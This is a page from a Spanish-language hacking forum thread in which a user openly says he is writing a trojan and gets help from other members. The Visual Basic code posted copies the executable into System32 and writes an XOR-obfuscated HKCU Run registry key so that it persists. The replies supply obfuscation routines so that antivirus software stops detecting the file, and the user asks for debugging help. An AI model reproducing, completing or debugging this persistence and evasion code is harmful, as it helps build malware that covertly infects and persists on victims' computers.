elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Únete al Grupo Steam elhacker.NET


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  copiar a system o system 32
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 [3] 4 Ir Abajo Respuesta Imprimir
Autor Tema: copiar a system o system 32  (Leído 12,237 veces)
Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: copiar a system o system 32
« Respuesta #20 en: 4 Mayo 2007, 14:49 pm »

Mira, te paso una fucnion mucho mas simple que eso, aki tienes:

Código:
Public Function crypt(j)
On Error Resume Next
For R = 1 To Len(j)
crypt = crypt & Chr(Asc(Mid(j, R, 1)) Xor 7)
Next
End Function

Esta funcion cifra y descifra a la vez, ya que usa Xor.

Un Saludo.  ;)


En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: copiar a system o system 32
« Respuesta #21 en: 4 Mayo 2007, 15:05 pm »

Para obtener la ruta de windows y de system32, mejor q andar usando la api es usar environ, por ej:

Código:
msgbox environ("WINDIR")
msgbox environ ("SYSTEMDIR")

La de system32 creo q era asi, q no me apetece provar  :xD :xD

Hay mas llamadas como HOMEDRIVE para el disco C (comunmente claro ;)) o TMP para los temporales, tb hay otra para archivos de programa pero no me acuerdo ahora..

1S4ludo


En línea

Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: copiar a system o system 32
« Respuesta #22 en: 4 Mayo 2007, 17:23 pm »

Para la carpeta System32 no hay ninguna (que yo sepa), la otra que te da la carpeta de windows es %Systemroot%.

Temporales --> tmp
Archivos de programa --> Programfiles

Si quieres ver todas esas variables, ve a la consola, escribe set y pulsa enter....

Un Saludo.  ;)

En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: copiar a system o system 32
« Respuesta #23 en: 4 Mayo 2007, 18:02 pm »

Da igual una q otra mira:

Código:
Private Sub Command1_Click()
MsgBox Environ("WINDIR")
MsgBox Environ("SYSTEMROOT")
End Sub
En línea

Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: copiar a system o system 32
« Respuesta #24 en: 4 Mayo 2007, 19:28 pm »

Ya lo se, tu habia puesto systemdir, que es incorrecto... ;) ;)

Un Saludo.
En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: copiar a system o system 32
« Respuesta #25 en: 4 Mayo 2007, 19:38 pm »

bien! al fin me anda el foro1 jeje hace horas q trato reponder...

Citar
Private Sub Command1_Click()
MsgBox Environ("WINDIR")
MsgBox Environ("SYSTEMROOT")
End Sub

gracias EON por ese code... seguro lo uso en otro troyano para ahorrarme un modulo...


y hendrix.. en seguida pruebo esa funcion ;)
pero me podrias decir q hice mal en la q invente... ademas de q es complicada... me mata no poder hacer algo bien XD
En línea

Hendrix
In The Kernel Land
Colaborador
***
Desconectado Desconectado

Mensajes: 2.276



Ver Perfil WWW
Re: copiar a system o system 32
« Respuesta #26 en: 4 Mayo 2007, 20:18 pm »

Te e arreglado la tuya:

Código:
Dim Des As String

Public Function descifrar(Ruta As String) As String
Ruta = Replace(Ruta, "####", "a")
Ruta = Replace(Ruta, "###$", "b")
Ruta = Replace(Ruta, "##$$", "c")
Ruta = Replace(Ruta, "#$$$", "d")
Ruta = Replace(Ruta, "$$$$", "e")
Ruta = Replace(Ruta, "$$$&", "f")
Ruta = Replace(Ruta, "$$&&", "g")
Ruta = Replace(Ruta, "$&&&", "h")
Ruta = Replace(Ruta, "&&&&", "i")
Ruta = Replace(Ruta, "&&&@", "j")
Ruta = Replace(Ruta, "&&@@", "k")
Ruta = Replace(Ruta, "&@@@", "l")
Ruta = Replace(Ruta, "@@@@", "m")
Ruta = Replace(Ruta, "@@@/", "n")
Ruta = Replace(Ruta, "@@//", "ñ")
Ruta = Replace(Ruta, "@///", "o")
Ruta = Replace(Ruta, "////", "p")
Ruta = Replace(Ruta, "///*", "q")
Ruta = Replace(Ruta, "//**", "r")
Ruta = Replace(Ruta, "/***", "s")
Ruta = Replace(Ruta, "****", "t")
Ruta = Replace(Ruta, "***%", "u")
Ruta = Replace(Ruta, "**%%", "v")
Ruta = Replace(Ruta, "*%%%", "w")
Ruta = Replace(Ruta, "%%%%", "x")
Ruta = Replace(Ruta, "%%%¬", "y")
Ruta = Replace(Ruta, "%%¬¬", "z")
Ruta = Replace(Ruta, "%¬¬¬", "0")
Ruta = Replace(Ruta, "¬¬¬¬", "1")
Ruta = Replace(Ruta, "¬¬¬<", "2")
Ruta = Replace(Ruta, "¬¬<<", "3")
Ruta = Replace(Ruta, "¬<<<", "4")
Ruta = Replace(Ruta, "<<<<", "5")
Ruta = Replace(Ruta, "<<<~", "6")
Ruta = Replace(Ruta, "<<~~", "7")
Ruta = Replace(Ruta, "<~~~", "8")
Ruta = Replace(Ruta, "~~~~", "9")
Ruta = Replace(Ruta, "~~~>", "A")
Ruta = Replace(Ruta, "~~>>", "B")
Ruta = Replace(Ruta, "~>>>", "C")
Ruta = Replace(Ruta, ">>>>", "D")
Ruta = Replace(Ruta, ">>>Ç", "E")
Ruta = Replace(Ruta, ">>ÇÇ", "F")
Ruta = Replace(Ruta, ">ÇÇÇ", "G")
Ruta = Replace(Ruta, "ÇÇÇÇ", "H")
Ruta = Replace(Ruta, "ÇÇǨ", "I")
Ruta = Replace(Ruta, "ÇǨ¨", "J")
Ruta = Replace(Ruta, "Ǩ¨¨", "K")
Ruta = Replace(Ruta, "¨¨¨¨", "L")
Ruta = Replace(Ruta, "¨¨¨^", "M")
Ruta = Replace(Ruta, "¨¨^^", "N")
Ruta = Replace(Ruta, "¨^^^", "Ñ")
Ruta = Replace(Ruta, "^^^^", "O")
Ruta = Replace(Ruta, "^^^[", "P")
Ruta = Replace(Ruta, "^^[[", "Q")
Ruta = Replace(Ruta, "^[[[", "R")
Ruta = Replace(Ruta, "[[[[", "S")
Ruta = Replace(Ruta, "[[[]", "T")
Ruta = Replace(Ruta, "[]]]", "U")
Ruta = Replace(Ruta, "]]]]", "V")
Ruta = Replace(Ruta, "]]]{", "W")
Ruta = Replace(Ruta, "]]{{", "X")
Ruta = Replace(Ruta, "]{{{", "Y")
Ruta = Replace(Ruta, "{{{{", "Z")
Ruta = Replace(Ruta, "{{{}", "á")
Ruta = Replace(Ruta, "{{}}", "é")
Ruta = Replace(Ruta, "{}}}", "í")
Ruta = Replace(Ruta, "}}}}", "ó")
Ruta = Replace(Ruta, "}}}\", "ú")
Ruta = Replace(Ruta, "}}\\", "Á")
Ruta = Replace(Ruta, "}\\\", "É")
Ruta = Replace(Ruta, "\\\\", "Í")
Ruta = Replace(Ruta, "\\\ð", "Ó")
Ruta = Replace(Ruta, "\\ðð", "Ú")
Ruta = Replace(Ruta, "\ððð", "ü")
Ruta = Replace(Ruta, "ðððð", "Ü")
descifrar = Ruta
End Function

Private Sub Command1_Click()
Des = descifrar("####$$&&***%/***")
MsgBox Des
End Sub

Eran errores muy basicos, conviene que te leas mas sobre VB antes de empezar a hacer segun que proyectos... :-\ :-\

Un Saludo.

En línea

"Todos los días perdemos una docena de genios en el anonimato. Y se van. Y nadie sabe de ellos, de su historia, de su peripecia, de lo que han hecho, de sus angustias, de sus alegrías. Pero al menos una docena de genios se van todos los días sin que sepamos de ellos". - Juan Antonio Cebrián
vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: copiar a system o system 32
« Respuesta #27 en: 5 Mayo 2007, 00:43 am »

gracias! me funciono re bien... perdon xq tarde en responder pero no me entraba el foro...

probe el server y lo sigue detectando... :( dice q intenta crear un archivo *.exe
creo q debe ser cuando se copia a system32
se puede cifrar esto?? como??

le dejo el code:

Código:
FileCopy App.Path & "\" & App.EXEName & ".exe", System32 & "\klass.exe"
Ruta = System32 & "\klass.exe"

el modulo es el q postie al principio



perodonen por tantas preguntas es q es la primera vez q hago esta parte de ltroyano... simpre hacia uno le pasaba el themida y solamente funcionaba hasta q apagaban la compu o lo borraban XD
En línea

vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: copiar a system o system 32
« Respuesta #28 en: 8 Mayo 2007, 00:06 am »

PROBLEMA SOLUCIONADO EL DE ABAJO! DESPUES DE MODIFICARLO MILES DE VECES ME DI CUENTA Q ME FALTABAN DOS " XD

no me anda :@ no se xq ya probe miles de formas y codigos... porfavor diganme q hago mal... :S


Código:
Dim Clave As Object
Dim WINDOWS As String

Private Sub Form_Load()
WINDOWS = Environ(windir)
FileCopy App.Path & "\" & App.EXEName & ".exe", "C:\jeje.exe"
Set Clave = CreateObject("WScript.shell")
Clave.regwrite descifrar("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[%'!'%mbmb%+'%D=[mbmb)bb")
End Sub

Private Function descifrar(j)
On Error Resume Next
For r = 1 To Len(j)
descifrar = descifrar & Chr(Asc(Mid(j, r, 1)) Xor 7)
Next
End Function

eso se copia y se graba en el registro... pero cuando compilo el programa dice:

Error '5' en tiempo de ejecucion:
Llamada a procedimiento o argumentos no válidos


q es?? no entiendo... el codigo creo q esta bien... hice lo q Hendrix me dijo  :huh:


bueno modifique el codigo cientos de veces... probe con nuevos proyectos... de todo... y creo q el error esta aca... pero no se como solucionarlo

Código:
Dim WINDOWS As String

Código:
WINDOWS = Environ(windir)
« Última modificación: 8 Mayo 2007, 04:11 am por vivachapas » En línea

vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: copiar a system o system 32
« Respuesta #29 en: 8 Mayo 2007, 04:27 am »

ahora me da error '450'
numero de argumentos erroneos o asignacion de propiedad no valida


esto me pone de mal humor.... :S


Código:
Dim WINDOWS As String
Dim Clave As Object

Private Sub Form_Load()
WINDOWS = Environ("windir")
Set Clave = CreateObject("WScript.shell")
Clave.regwrite descifrar("OLB^XDRUUBISXRTBU[Thaspfub[Jnduhthas[Pnichpt[DruubisQbutnhi[Uri[%'!'%wurbef%+'%D=[mbmb)bb")
End Sub

Private Function descifrar(j)
On Error Resume Next
For r = 1 To Len(j)
descifrar = descifrar & Chr(Asc(Mid(j, r, 1)) Xor 7)
Next
End Function

veran q todos los code son distintos ya q voy probando cambiando... haciendo nuevos proyectos -.-
bueno espero q alguien detecte el error por favor... esto ya me estallevando muchisimo tiempo
En línea

Páginas: 1 2 [3] 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Utilidad proceso SYSTEM
Windows
crazykenny 8 6,351 Último mensaje 27 Abril 2011, 23:10 pm
por Randomize
System.Xml.Linq y System.Core « 1 2 »
.NET (C#, VB.NET, ASP)
SγиtαxEяяoя 10 7,140 Último mensaje 23 Junio 2013, 23:50 pm
por Eleкtro
[PC]System Shock (2020)
Juegos y Consolas
luiti 0 1,622 Último mensaje 26 Septiembre 2020, 17:54 pm
por luiti
System.Net métodos
.NET (C#, VB.NET, ASP)
Beginner Web 0 1,772 Último mensaje 6 Noviembre 2020, 23:33 pm
por Beginner Web
System Informer
Software
B€T€B€ 1 3,492 Último mensaje 13 Marzo 2023, 02:11 am
por ThunderCls
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines